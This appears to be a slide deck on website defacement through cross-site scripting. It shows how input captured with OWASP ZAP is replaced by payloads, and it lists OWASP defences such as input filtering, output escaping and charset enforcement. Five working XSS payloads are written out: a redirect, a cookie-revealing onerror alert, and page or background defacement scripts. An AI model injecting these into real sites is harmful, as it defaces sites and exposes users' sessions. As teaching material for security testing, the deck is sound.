Web Defacement – XSS

Introduction• Website defacement is an attack on a website that

changes the visual appearance of the site or a webpage. Defacing is one of the most common things when the hacker found the vulnerability in website.

• Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.

Testing• Test will be entered and captured each time using OWASPs

ZAP Proxy. Once this is captured we will the replace the Test with our malicious code in turn bypassing the client-side preventions the web site has in place.

1• Redirected to hacked Image out of the App Domain

<script>window.location="http://www.theblacktechreport.com/wp content/uploads/2011/01/hacked.jpg";</script>

• Adds a hacked image to the page<img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg"

onerror=alert(document.cookie);>

2

• Cover full page with Hacked - in App Domain<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS

HACKED</h1></div>";</script>

3

• Change background to RED - in App Domain<script>document.body.bgColor="red";</script>

4

• Set the background to Hacked Image- in App Domain <script>document.body.background="http://www.theblacktechreport.com/wp-content/uploads/2011/01/

hacked.jpg";</script>

5

OWASP XSS Defense1 Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of this characters is

needed by the application, properly escaping is enough. A non comprehensive list of characters likely to be part of an attack vector is:

• <> (triangular parenthesis) • () (parenthesis) • " (quotation mark) • & (ampersand sign) • ' (single apostrophe) • + (plus sign) • % (percent sign) • = (equals sign) • : (colon) • ` (forward tick) • ; (semicolon) • ´ (back tick)

2 Escape all the untrusted output before presenting to the UI. Follow the rules detailed in the next link to ensure proper escaping for every context and location: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_ Cheat_Sheet

3 When possible, it is recommended to enforce a specific charset encoding (using 'Content-Type' header or <meta> tag).